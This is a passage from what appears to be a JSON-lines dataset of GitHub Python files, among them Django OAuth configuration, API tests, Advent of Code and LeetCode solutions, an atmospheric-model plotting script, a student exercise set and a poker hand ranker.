base\n\n\nGOOGLE_SCOPES = ['https://www.googleapis.com/auth/spreadsheets']\n\n\ndef _get_flow(alias):\n db_backend = connections[alias]\n if not isinstance(db_backend, base.DatabaseWrapper):\n raise exceptions.ImproperlyConfigured(\n 'Configured database is not Google Sheets backend')\n return google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n db_backend.settings_dict['APP_SECRET'], scopes=GOOGLE_SCOPES)\n\n\ndef get_db_configuration_url(callback_uri, alias=DEFAULT_DB_ALIAS):\n flow = _get_flow(alias)\n flow.redirect_uri = callback_uri\n url, state = flow.authorization_url(access_type='offline')\n return url\n\n\ndef is_db_configured(alias=DEFAULT_DB_ALIAS):\n db_backend = connections[alias]\n db_backend.ensure_connection()\n return 
db_backend.connection.configured\n\n\ndef configure_db(request, alias=DEFAULT_DB_ALIAS, callback_uri=None):\n user_code = request.GET['code']\n flow = _get_flow(alias)\n callback_uri = callback_uri or \\\n f'{request.scheme}://{request.headers[\"HOST\"]}{request.path}'\n flow.redirect_uri = callback_uri\n flow.fetch_token(code=user_code)\n db_backend = connections[alias]\n db_backend.ensure_connection()\n db_backend.connection.configure(flow.credentials)\n","repo_name":"kozzztik/pm_viewer","sub_path":"sheets_db/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26619003837","text":"import sys\nimport os\nsys.path.append('../')\nimport unittest\nfrom unittest.mock import patch\nimport requests\n\nfrom youtube_api import YouTubeDataAPI\n\nclass TestAPI(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.key = os.environ.get('YT_KEY')\n cls.wrong_key = 'xxxxxxxxx'\n cls.yt = YouTubeDataAPI(cls.key, timeout=10)\n\n\n def test_init(self):\n '''#Verified by Megan Brown on 11/30/2018'''\n with self.assertRaisesRegex(ValueError, 'No API key used to initate the class.'):\n yt = YouTubeDataAPI('')\n\n with self.assertRaisesRegex(ValueError, 'The API Key is invalid'):\n yt = YouTubeDataAPI(self.wrong_key)\n\n\n @patch('requests.get')\n def test_verify(self, mock_request):\n '''#verified by Megan Brown on 11/30/2018'''\n mock_resp = requests.models.Response()\n mock_resp.status_code = 404\n mock_request.return_value = mock_resp\n\n self.assertEqual(self.yt.verify_key(), False)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SMAPPNYU/youtube-data-api","sub_path":"tests/test_initialization.py","file_name":"test_initialization.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"47"} +{"seq_id":"4008335268","text":"# we have pairings of sensors and beacons. Sensors know the location of the closest beacon. Because it's the 'closest' we know no position inside the same radius is a beacon. Since we know this, we can mark the radius around each sensor as unable to contain a beacon. Then we can do this for every sensor, then check the target line and see how many spots are taken up by marks.\n\n#Okay I solved pt 1 by just checking which sets of deltas between sensor coords and their respective beacons added and minused to their sensor's y coordinate would cross the chosen y_line, then calculated the spread of non-beacon area based on how far across past the y_line the delta reached. So not brute force.\n\n#Part two I'm having trouble understanding exactly what they're asking for. Okay so it seems like they're asking for a singular position that will be open when you run this algorithm across a space of 4,000,000 square spaces, starting from 0 for both x and y values. 
I may have to optimize.\n\nfrom re import findall\n\ni_n, useful, y_line, not_beacons, offset, total = list(list(map(int, findall(r\"-?\\d+\", l))) for l in open('2022/15/input.txt').read().splitlines()), [], 10, ['_' for _ in range(30)], 0, 0\n\n\n\nfor coords in i_n:\n delta = abs(coords[0] - coords[2]) + abs(coords[1] - coords[3])\n if (y_line - coords[1] >= 0 and coords[1] + delta >= y_line) or (y_line - coords[1] < 0 and coords[1] - delta <= y_line):\n useful.append(((coords[0], coords[1]), delta))\n if coords[3] == y_line:\n not_beacons[coords[2] + offset] = 'O'\n\nprint(useful)\n\n\nfor coords, delta in useful:\n if y_line - coords[1] > 0:\n coverage = (coords[1] + delta) - y_line\n elif y_line - coords[1] < 0:\n coverage = y_line - (coords[1] - delta)\n else:\n not_beacons[coords[0] + offset] = 'O'\n coverage = delta\n for pos in range(0, coverage + 1):\n not_beacons[coords[0] + pos + offset] = '#' if not_beacons[coords[0] + pos + offset] != 'O' else 'O'\n for neg in range(0, -coverage - 1, -1):\n not_beacons[coords[0] + neg + offset] = '#' if not_beacons[coords[0] + neg + offset] != 'O' else 'O'\n \nfor item in not_beacons:\n if item == '#':\n total += 1\n\n# print(not_beacons)\nprint(total)\n \n\n","repo_name":"carsonmagnuson/Advent-of-Code","sub_path":"2022/15/fifteen.py","file_name":"fifteen.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"75007875983","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#SBATCH --job-name=timeseries\n#SBATCH --ntasks=1\n#SBATCH --mem=10gb\n#SBATCH --partition=interactive\n#SBATCH --time=00:10:00\n#SBATCH --output=LOGS/timeseries.log\nimport sys\nimport pandas as pd\nimport glob\nimport re\nimport datetime\nimport numpy as np\nfrom netCDF4 import Dataset\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib\nmatplotlib.use('agg')\nsys.path.append('/users/mjr583/python_lib')\nimport GC_tools as GC\nimport RowPy as rp\nfrom CVAO_dict import CVAO_dict as d\nimport CVAO_tools as CV\nplt.style.use('seaborn-darkgrid')\n\n# Define a function to process time from \"minutes since T0 to datetime format \ndef GC_time_to_datetime(time):\n t0=fh.variables['time'].units\n t0=(int, re.findall(r'\\d+', t0))[1]\n t0=datetime.datetime(int(t0[0]), int(t0[1]), int(t0[2]), int(t0[3]), int(t0[4]), int(t0[5]) )\n times=[]\n for dt in time[:]:\n times.append( t0 + datetime.timedelta(minutes=dt) )\n times=np.array(times)\n return times\n\nvariables=['CO','O3','C2H6','NO2','NO']\nlabels=['Control','No BB','No African BB']\nbc = '/users/mjr583/scratch/GC/12.9.3/rundirs/irma_025x03125/GC_BC/'\nbc_nobb = '/users/mjr583/scratch/GC/12.9.3/rundirs/irma_025x03125_noBB/GC_BC/'\nbc_noaf = '/users/mjr583/scratch/GC/12.9.3/rundirs/irma_025x03125_noAfBB/GC_BC/'\n\nx = -24.9\ny = 16.9\nCO=[] ; times=[]\n\nfor var in variables:\n print(var)\n CO=[] ; times=[]\n for infile in sorted(glob.glob('%s*Boundary*201708*control.nc4' %bc)):\n print(infile)\n fh=Dataset(infile)\n co = fh.variables['SpeciesBC_%s' %var][:]*1e9\n CO.append(co)\n\n time=fh.variables['time']\n times.append( GC_time_to_datetime(time) ) \n\n lats=fh.variables['lat'][:]\n lons=fh.variables['lon'][:]\n lat_idx=rp.find_nearest(lats,y)\n lon_idx=rp.find_nearest(lons,x)\n print(lats[lat_idx])\n print(lons[lon_idx])\n\n CO=np.concatenate(CO)\n CO=CO[:,0,lat_idx, lon_idx]\n\n time=np.concatenate(times)\n\n df=pd.DataFrame({'BC_CO':CO}, index=time)\n\n CO=[] ; times=[]\n for infile in 
sorted(glob.glob('%s*Boundary*201708*NOBB.nc4' %bc_nobb)):\r\n        print(infile)\r\n        fh=Dataset(infile)\r\n        co = fh.variables['SpeciesBC_%s' %var][:]*1e9\r\n        CO.append(co)\r\n\r\n        time=fh.variables['time']\r\n        times.append( GC_time_to_datetime(time) ) \r\n    CO=np.concatenate(CO)\r\n    print(CO.shape)\r\n    CO=CO[:,0,lat_idx, lon_idx]\r\n    time=np.concatenate(times)\r\n    nobb=pd.DataFrame({'BC_CO':CO}, index=time) \r\n\r\n    CO=[] ; times=[]\r\n    for infile in sorted(glob.glob('%s*Boundary*201708*noAfBB.nc4' %bc_noaf)):\r\n        print(infile)\r\n        fh=Dataset(infile)\r\n        co = fh.variables['SpeciesBC_%s' %var][:]*1e9\r\n        CO.append(co)\r\n\r\n        time=fh.variables['time']\r\n        times.append( GC_time_to_datetime(time) ) \r\n    CO=np.concatenate(CO)\r\n    print(CO.shape)\r\n    CO=CO[:,0,lat_idx, lon_idx]\r\n    time=np.concatenate(times)\r\n    noaf=pd.DataFrame({'BC_CO':CO}, index=time)\r\n    \r\n    \r\n    nobb=nobb.resample('D').mean()\r\n    noaf=noaf.resample('D').mean()\r\n    df=df.resample('D').mean()\r\n    df=df['2017-08':'2017-09']\r\n\r\n\r\n    plt.plot(df.index,df.BC_CO,label='Default boundary conditions')\r\n    plt.plot(nobb.index,nobb.BC_CO, label='With no biomass burning')\r\n    plt.plot(noaf.index,noaf.BC_CO, label='With no African biomass burning')\r\n\r\n    plt.ylim(bottom=0)\r\n    plt.legend()\r\n    plt.savefig('plots/GC_BC_%s_at%sN%sW.png' %(var, str(lats[lat_idx]), str(lons[lon_idx]) ) )\r\n    plt.close()\r\n","repo_name":"matt-rowlinson/GC_python_directories","sub_path":"interhemispheric_mixing/boundaryconds_timeseries.py","file_name":"boundaryconds_timeseries.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19002010598","text":"# Definition for singly-linked list with a random pointer.\n# class RandomListNode(object):\n#     def __init__(self, x):\n#         self.label = x\n#         self.next = None\n#         self.random = None\n\n\nclass Solution(object):\n    def copyRandomList(self, head):\n        \"\"\"\n        :type head: RandomListNode\n        :rtype: RandomListNode\n        \"\"\"\n        if head is None:\n            return None\n\n        # spawn new nodes following old nodes\n        node = head\n        while node is not None:\n            n = node.next\n            node.next = RandomListNode(node.label)\n            node.next.next = n\n            node = n\n\n        # populate random pointer of new nodes\n        node = head\n        while node is not None:\n            n = node.next.next\n            if node.random is not None:\n                node.next.random = node.random.next\n            node = n\n\n        out = head.next\n        node = head\n        while node is not None:\n            n = node.next.next\n            n2 = node.next\n            node.next = n\n            if n is not None:\n                n2.next = n.next\n            node = n\n\n        return out\n","repo_name":"devilhtc/leetcode-solutions","sub_path":"0x008a_138.Copy_List_With_Random_Pointer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"9567144948","text":"import os\nfrom edit_file_credit import TIIE_file_edit_from_py\nfrom getTIIE import TIIE_Actual\n\nclass insert_data():\n    def __init__(self, path_file: str, sheet_name: str) -> None:\n        \"\"\"\n        params:\n            path_file (str): path to excel document\n            sheet_name (str): name of excel sheet to work and insert data\n        \n        description: \n            Instantiate the Excel document, with the given sheet name, to allow inserting the TIIE data and saving to the same file path. \n\n        \"\"\"\n        # From the TIIE object we only take the current value.\n        TIIE = TIIE_Actual()[\"dato\"]\n\n        # Instantiate the Excel document so we can work with and manipulate it.\n        client = TIIE_file_edit_from_py(path_file)\n\n        # Set the sheet we are going to work with.\n        
client.set_sheet_name(sheet_name)\n print(client.sheet_names)\n \"insert the tiie in the document excel file confirm to open the file and view the data en column with the name TIIE \"\n client.insert_value_in_client(TIIE)\n\n\nif __name__ == \"__main__\":\n path = \"./Control de crédito mensual .xlsx\"\n sheet_name = \"Alejandro Ochoa\"\n control_credito = insert_data(path_file=path,sheet_name=sheet_name)\n print(path)","repo_name":"Rigobertoj/process_automation","sub_path":"calculo_financiero/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73089088141","text":"# coding: utf-8\n\nfrom rest_framework import status, mixins\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom .models import AnalysisLog\nfrom .serializer import AnalysisLogSerializer\n\n\n# PUT以外のメソッドを実装\nclass AnalysisLogViewSet(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n GenericViewSet):\n\n queryset = AnalysisLog.objects.all()\n serializer_class = AnalysisLogSerializer\n\n # POSTの場合は特別なレスポンスを返す\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n\n # 成功している場合は201で返す\n response_status = status.HTTP_201_CREATED if serializer.data['success'] == 'True' \\\n else status.HTTP_400_BAD_REQUEST\n\n return Response({'success': serializer.data['success'],\n 'message': serializer.data['message'],\n 'estimated_data':\n self.return_estimated_data(serializer.data['field_class'],\n serializer.data['confidence'])\n }, status=response_status, headers=headers)\n\n def return_estimated_data(self, field_class, confidence):\n if not field_class or not confidence:\n return {}\n\n return {'class': field_class, 'confidence': confidence}\n","repo_name":"amatsukixgithub/django_practice","sub_path":"analysislog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15402736715","text":"\"\"\"\nWord Break II\nGiven a non-empty string s and a dictionary wordDict containing a list of non-empty words, add spaces in s to construct a sentence where each word is a valid dictionary word. Return all such possible sentences.\n\nNote:\n\nThe same word in the dictionary may be reused multiple times in the segmentation.\nYou may assume the dictionary does not contain duplicate words.\nExample 1:\n\nInput:\ns = \"catsanddog\"\nwordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\nOutput:\n[\n \"cats and dog\",\n \"cat sand dog\"\n]\nExample 2:\n\nInput:\ns = \"pineapplepenapple\"\nwordDict = [\"apple\", \"pen\", \"applepen\", \"pine\", \"pineapple\"]\nOutput:\n[\n \"pine apple pen apple\",\n \"pineapple pen apple\",\n \"pine applepen apple\"\n]\nExplanation: Note that you are allowed to reuse a dictionary word.\nExample 3:\n\nInput:\ns = \"catsandog\"\nwordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\nOutput:\n[]\n\"\"\"\n\n\"\"\"\nDFS\n\n1.Every time, we check whether s starts with a word. If so, we check whether the substring s[len(word):] starts with a word, etc.\n2.resultOfTheRest keeps calling until we hit the last word. 
If the last word is in the dict, we append it to res.\nThe last word is 'dog' ==> res = [\"dog\"]\n3. This time, we skip \"else,\" since we fulfill the condition \" if len(word) == len(s).\" We store it in memo: {'dog': ['dog']}\n\n4. Then we return to \"resultOfTheRest = self.helper(s[len(word):], wordDict, memo)\"\ns = \"sanddog\" because we start with \"cat\" (cat is the first word in the dict) and \"cat\" leads to \"sand\".\nresultOfTheRest = [\"dog\"]\nword = \"sand\"\nitem = \"sand dog\"\nres = [\"sand dog\"]\nmemo ={'dog': ['dog'], \"sanddog\":[\"sand dog\"] }\n\nWhy do we need memo?\nWe always recurse to the last word in the string and backtrack, so storing all possible combinations of the substring in the memo saves time for the next iteration of the whole string. For example, \"catsanddog,\" if we don't store \"dog,\" then we have to iterate through the dictionary. This is very DP.\n\nTime: O(n^3) size of recursion is n^2 and we go through n results\nSpace: O(n^3)\n\"\"\"\nfrom typing import List  # required for the List[str] annotations below\n\n\nclass Solution:\n    def wordBreak(self, s: str, wordDict: List[str]) -> List[str]:\n        \n        def dfs(s, wordDict, memo):\n            if s in memo:\n                return memo[s]\n            if not s:\n                return []\n            res = []\n            for word in wordDict:\n                if not s.startswith(word):\n                    continue\n                if len(word) == len(s):\n                    res.append(word)\n                else:\n                    remains = dfs(s[len(word):], wordDict, memo)\n                    for remain in remains:\n                        remain = '{} {}'.format(word, remain)\n                        res.append(remain)\n            memo[s] = res\n            return memo[s]\n        \n        memo = dict()\n        return dfs(s, wordDict, memo)\n\n","repo_name":"Bennyhwanggggg/Algorithm-and-Data-Structures-and-Coding-Challenges","sub_path":"Challenges/wordBreakII.py","file_name":"wordBreakII.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"18542012440","text":"# Q1\r\nprint(\"To convert a given temperature from deg C to deg F\")\r\na = 40 # degree celsius\r\nb = a*1.8 + 32\r\nprint(a, \" degree celsius converted to \", b, \"Fahrenheit\")\r\n\r\n\r\n# Q2\r\n\r\nprint(\"To check if number m is divisible by number n\")\r\nm = int(input(\"Number m : \"))\r\nn = int(input(\"Number n : \"))\r\nif m % n == 0 :\r\n    print(m, \"is divisible by \", n)\r\nelse:\r\n    print(m, \"is not divisible by \", n)\r\n\r\n\r\n# Q3\r\nprint(\"To check whether given integer is odd or even\")\r\nc = int(input(\"Enter an integer : \"))\r\nif c % 2 == 0 :\r\n    print(c, \"is even\")\r\nelse:\r\n    print(c, \"is odd\")\r\n\r\n\r\n# Q4\r\nprint(\"To create a user defined function to obtain sum of first n natural number \")\r\nnum1 = int(input(\"Enter number up to which we want sum \"))\r\ni = 1\r\nsum1 = 0\r\nwhile i <= num1:\r\n    sum1 = sum1 + i\r\n    i = i + 1\r\nprint(\"Sum of first n numbers is\", sum1)\r\n\r\nprint(\"To create a user defined function to obtain sum of square of first n natural number\")\r\nnum2 = int(input(\"Enter number up to which we want sum \"))\r\nj = 1\r\nsum2 = 0\r\nwhile j <= num2:\r\n    sum2 = sum2 + (j*j)\r\n    j = j+1\r\nprint(\"sum of square of first n natural number is\", sum2)\r\n\r\n\r\n# Q5\r\nprint(\"To obtain sum of first n odd numbers\")\r\nlimit = int(input(\"Enter limit \"))\r\nk = 1\r\nsum3 = 0\r\nwhile k <= limit:\r\n    sum3 = sum3 + k\r\n    k = k+2\r\nprint(\"Sum of n odd no. 
is\", sum3)\r\n\r\n\r\n# Q6\r\nprint(\"To obtain sum of first n even numbers\")\r\n\r\nn = int(input(\"How many even no.s you want to add \"))\r\nl = 1\r\nsum4 = 0\r\ncount = 1\r\nwhile count <= n:\r\n if (l%2 == 0):\r\n sum4 = sum4 + l\r\n count = count + 1\r\n l = l+1\r\nprint(\"Sum of even no.s=\", sum4)\r\n\r\n\r\n# Q7\r\nprint(\"To find and print the A-B and B-A of two sets A and B\")\r\ndef A_B(A, B):\r\n A_minus_B = A - B\r\n B_minus_A = B - A\r\n print(\"Set A minus Set B (A-B) is :\", A_minus_B)\r\n print(\"Set B minus Set A (B-A) is :\", B_minus_A)\r\n\r\n\r\nA = {\"a\", \"b\", \"c\", \"d\"} # Given\r\nB = {\"b\", \"c\", \"e\"} # Given\r\nA_B(A, B)\r\n\r\n\r\n# Q8\r\nprint(\"To calculate and print sum and sum of square of given numbers: 20, 12, 15, 1, 7, 10, 5, 1, 15, 5\")\r\nx = [20, 12, 15, 1, 7, 10, 5, 1, 15, 5]\r\ny = 1\r\nsum5, sum6 = 0, 0\r\nwhile y <= x:\r\n sum5 = sum5 + y\r\n sum6 = sum6 + (y*y)\r\n y = y + 1\r\nprint(\"Sum of given numbers is\", sum5)\r\nprint(\"sum of square of first n natural number is\", sum6)","repo_name":"AMANOZAKO/Basics-of-Python_SPC","sub_path":"9111 Assignment 3 Ishita Namdeo.py","file_name":"9111 Assignment 3 Ishita Namdeo.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24872510492","text":"#! /usr/bin/env python\n\"\"\"\nTakes a directory of extractions json and writes to two output directories:\nplaintext paragraph dumps and one sentence tokenized per line.\nSkips empty_output.txt files and filtered by language id dir.\n\"\"\"\nimport json\nimport os\nfrom argparse import ArgumentParser\n\nfrom extraction.document import Document\n\n\ndef plaintextify():\n parser = ArgumentParser(description=__doc__)\n parser.add_argument(\"inputdir\", help=\"Input directory\")\n parser.add_argument(\"outputdir\", help=\"Output directory\")\n parser.add_argument(\"--section\", help=\"Filter articles of a certain section\")\n parser.add_argument(\"--keyword\", help=\"Filter articles of a certain section\")\n parser.add_argument(\"--raw-only\", action=\"store_true\")\n parser.add_argument(\"--tokenized-only\", action=\"store_true\")\n args = parser.parse_args()\n\n raw_outdir = os.path.join(args.outputdir, \"raw_paragraphs\")\n sents_outdir = os.path.join(args.outputdir, \"tokenized_sentences\")\n\n # Walk the input dir\n for subdir in os.listdir(args.inputdir):\n\n # Completely skip the filtered directory\n if subdir == \"lang_id_filtered\":\n continue\n\n insubdir = os.path.join(args.inputdir, subdir)\n # Skip non-directories, like .DS_Store files\n if not os.path.isdir(insubdir):\n continue\n\n raw_sub = os.path.join(raw_outdir, subdir)\n sents_sub = os.path.join(sents_outdir, subdir)\n if not args.tokenized_only:\n os.makedirs(raw_sub, exist_ok=True)\n if not args.raw_only:\n os.makedirs(sents_sub, exist_ok=True)\n files = os.listdir(insubdir)\n for f in files:\n # This ignores empty_output.txt, which is just a list of urls where we didn't\n # extract anything, but it also covers OS files like .DS_Store\n if not f.endswith(\".json\"):\n continue\n filepath = os.path.join(insubdir, f)\n with open(filepath, \"r\", encoding=\"utf8\") as infile:\n json_dict = json.load(infile)\n doc = Document.from_dict(json_dict)\n # Skip document if filtering by section\n if args.section and args.section != doc.section:\n continue\n if args.keyword and args.keyword not in doc.keywords:\n continue\n filename = doc.filename.replace(\".html\", \"\") + \".txt\"\n raw_path 
= os.path.join(raw_sub, filename)\n sents_path = os.path.join(sents_sub, filename)\n if not args.tokenized_only:\n with open(raw_path, \"w\", encoding=\"utf8\") as raw_out:\n raw_out.write(\"\\n\\n\".join([doc.title] + doc.paragraphs))\n if not args.raw_only:\n with open(sents_path, \"w\", encoding=\"utf8\") as sents_out:\n sents_out.write(doc.title + \"\\n\\n\")\n sents_out.write(\n \"\\n\\n\".join(\n [\n \"\\n\".join([\" \".join(sent) for sent in paragraph])\n for paragraph in doc.tokens\n ]\n )\n )\n\n\nif __name__ == \"__main__\":\n plaintextify()\n","repo_name":"bltlab/mot","sub_path":"extraction/plaintextify.py","file_name":"plaintextify.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"47"} +{"seq_id":"16038017870","text":"import sys\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# python templateMatchingTest.py path_to_frame.jpg path_to_object_template.jpg\n\nframe = sys.argv[1]\nobjeto = sys.argv[2]\n\nimg = cv.imread(frame, 0)\nimg2 = img.copy()\ntemplate = cv.imread(objeto, 0)\nimgWidth, imgHeight = template.shape[::-1]\n\nmethods = ['cv.TM_CCOEFF', 'cv.TM_CCOEFF_NORMED', 'cv.TM_CCORR',\n 'cv.TM_CCORR_NORMED', 'cv.TM_SQDIFF', 'cv.TM_SQDIFF_NORMED']\n\nprint(\"Métodos:\")\nfor i, method in enumerate(methods):\n print(f\"{i + 1}. {method}\")\nindiceMetodoSelecionado = int(\n input(\"Qual método quer usar: \")) - 1\n\nmetodoSelecionado = methods[indiceMetodoSelecionado]\n\nimg = img2.copy()\nmethod = eval(metodoSelecionado)\nres = cv.matchTemplate(img, template, method)\n_, _, minLoc, maxLoc = cv.minMaxLoc(res)\n\nif method in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\n topLeft = minLoc\nelse:\n topLeft = maxLoc\n\nbottomRight = (topLeft[0] + imgWidth, topLeft[1] + imgHeight)\n\ncv.rectangle(img, topLeft, bottomRight, 255, 2)\n\nplt.subplot(122)\nplt.imshow(img, cmap='gray')\nplt.title('')\nplt.xticks([])\nplt.yticks([])\n\nplt.subplot(121)\nplt.imshow(res, cmap='gray')\nplt.title(metodoSelecionado)\nplt.xticks([])\nplt.yticks([])\n\nprint(f'Método: {metodoSelecionado}\\nMin: {minLoc}\\nMax: {maxLoc}\\n')\n\nplt.show()\n","repo_name":"victorrequia/UDESC","sub_path":"PIM - Processamento de Imagens/Listas de Exercícios/Tarefa Final/Source/C/templateMatch.py","file_name":"templateMatch.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28419574020","text":"class Solution:\n def solve(self, weights, limit):\n # Write your code here\n weights.sort()\n i,j = 0, len(weights) -1\n ans = 0\n while i <= j:\n if weights[i] + weights[j] <= limit:\n i+=1\n j-=1\n ans +=1\n return ans","repo_name":"Alferdize/Data-Structure-and-Algorithms","sub_path":"Algorithms/binary_search.com/rocketship_rescue.py","file_name":"rocketship_rescue.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30850158554","text":"import random\nimport sys\n\nclass Card:\n def __init__(self, face, suite):\n if face < 11:\n if face == 10:\n self.face = face\n else:\n self.face = ' ' + str(face)\n if face == 11:\n self.face = ' J'\n if face == 12:\n self.face = ' Q'\n if face == 13:\n self.face = ' K'\n if face == 14:\n self.face = ' A'\n if suite == 1:\n self.suite = 'D'\n if suite == 2:\n self.suite = 'C'\n if suite == 3:\n self.suite = 'H'\n if suite == 4:\n self.suite = 'S'\n self.face_int = face\n 
self.suite_int = suite\n\nclass Poker_Table:\n def __init__(self):\n self.hands = []\n self.deck = []\n self.duplicate = None\n for x in range (1,5):\n for y in range(2,15):\n self.deck.append(Card(y,x))\n random.shuffle(self.deck)\n def input_hands(self):\n with open(sys.argv[1], 'r') as my_file:\n lines = my_file.readlines()\n for line in lines:\n self.hands.append(Hand())\n line = line.strip()\n cards = line.split(\",\")\n for card in cards:\n str = card.replace(\" \", \"\")\n new_card = self.input_card(str[-2],str[-1])\n self.hands[-1].deal(new_card)\n found = False\n for search_card in self.deck:\n if search_card.face_int == new_card.face_int and search_card.suite_int == new_card.suite_int:\n self.deck.pop(self.deck.index(search_card))\n found = True\n if not found:\n if not self.duplicate:\n self.duplicate = Hand()\n self.duplicate.deal(new_card)\n else:\n duplicated = False\n for card in self.duplicate.hand:\n if card.face_int == new_card.face_int and card.suite_int == new_card.suite_int:\n duplicated = True\n if not duplicated:\n self.duplicate.deal(new_card)\n def input_card(self, face, suite):\n if face == \"A\":\n face_int = 14\n elif face == \"K\":\n face_int = 13\n elif face == \"Q\":\n face_int = 12\n elif face == \"J\":\n face_int = 11\n elif face == \"0\":\n face_int = 10\n else:\n face_int = int(face)\n if suite == 'D':\n suite_int = 1\n elif suite == 'C':\n suite_int = 2\n elif suite == 'H':\n suite_int = 3\n else:\n suite_int = 4\n return Card(face_int, suite_int)\n def deal(self):\n for x in range(0,5):\n for y in range(0,6):\n if x == 0:\n self.hands.append(Hand())\n self.hands[y].deal(self.deck[0])\n self.deck.pop(0)\n def print_deck(self, col = 52):\n for x in range(0,len(self.deck)):\n print(self.deck[x].face, self.deck[x].suite, sep='', end=' ')\n if x % col == col - 1:\n print()\n print('\\n')\n def print_hands(self):\n for hand in self.hands:\n for card in hand.hand:\n print(card.face, card.suite, sep='', end=' ')\n if not hand.value == 0:\n print(\"---\", hand.value_str, end='')\n print()\n print('\\n')\n def rank_hands(self):\n for hand in self.hands:\n sorted_hand = hand.sort()\n temp = []\n flush = 0\n straight = True\n prev_card_int = None\n for x in range(0,5):\n if flush != 0 and flush != 5:\n if sorted_hand[x].suite_int != flush:\n flush = 5\n elif flush == 0:\n flush = sorted_hand[x].suite_int\n\n if prev_card_int == None:\n prev_card_int = sorted_hand[x].face_int\n elif straight:\n if prev_card_int + 1 == sorted_hand[x].face_int or (prev_card_int == 5 and sorted_hand[x].face_int == 14):\n if prev_card_int == 5 and sorted_hand[x].face_int == 14:\n hand.low_ace = True\n if not x == 4:\n prev_card_int = sorted_hand[x].face_int\n else:\n straight = False\n \n if len(temp) == 0:\n temp.append([])\n temp[0].append(sorted_hand[x])\n else:\n inserted = False\n for y in temp:\n if y[0].face_int == sorted_hand[x].face_int:\n y.append(sorted_hand[x])\n inserted = True\n if not inserted:\n temp.append([])\n temp[len(temp)-1].append(sorted_hand[x])\n hand.sorted = temp\n if len(temp) == 2:\n if len(temp[0]) == 1 or len(temp[0]) == 4:\n hand.value = 3\n hand.value_str = \"Four of a Kind\"\n else:\n hand.value = 4\n hand.value_str = \"Full House\"\n elif len(temp) == 3:\n if len(temp[0]) == 3 or len(temp[1]) == 3 or len(temp[2]) == 3:\n hand.value = 7\n hand.value_str = \"Three of a Kind\"\n else:\n hand.value = 8\n hand.value_str = \"Two Pair\"\n elif len(temp) == 4:\n hand.value = 9\n hand.value_str = \"Pair\"\n if flush != 5 and straight:\n if hand.low_ace and 
prev_card_int == 5:\n hand.value = 2\n hand.value_str = \"Straight Flush\"\n else:\n hand.value = 1\n hand.value_str = \"Royal Straight Flush\"\n elif flush != 5:\n hand.value = 5\n hand.value_str = \"Flush\"\n elif straight:\n hand.value = 6\n hand.value_str = \"Straight\"\n if hand.value == 0:\n hand.value = 10\n hand.value_str = \"High Card\"\n def order_hands(self):\n sorted_hands = []\n for hand in self.hands:\n sorted_hands.append(hand)\n n = len(sorted_hands)\n swapped = False\n for i in range(n-1):\n for j in range(0, n-i-1):\n if sorted_hands[j].value > sorted_hands[j + 1].value:\n swapped = True\n sorted_hands[j], sorted_hands[j + 1] = sorted_hands[j + 1], sorted_hands[j]\n elif sorted_hands[j].value == sorted_hands[j + 1].value:\n if self.tiebreak(sorted_hands[j], sorted_hands[j + 1]):\n swapped = True\n sorted_hands[j], sorted_hands[j + 1] = sorted_hands[j + 1], sorted_hands[j]\n if not swapped:\n self.hands = sorted_hands\n self.hands = sorted_hands\n def tiebreak(self, hand_1, hand_2):\n if hand_1.groups == None:\n hand_1.group()\n if hand_2.groups == None:\n hand_2.group()\n \n temp_1 = hand_1.groups.copy()\n temp_2 = hand_2.groups.copy()\n \n return self.tiebreak_recursive(temp_1,temp_2,hand_1,hand_2)\n def tiebreak_recursive(self, hand_1, hand_2, ref_1, ref_2):\n if hand_1[-1][-1][-1].face_int < hand_2[-1][-1][-1].face_int:\n return True\n elif hand_1[-1][-1][-1].face_int == hand_2[-1][-1][-1].face_int:\n if not len(hand_1[-1][0]) == 1:\n if len(hand_1[-1]) == 1:\n hand_1.pop(len(hand_1) - 1)\n 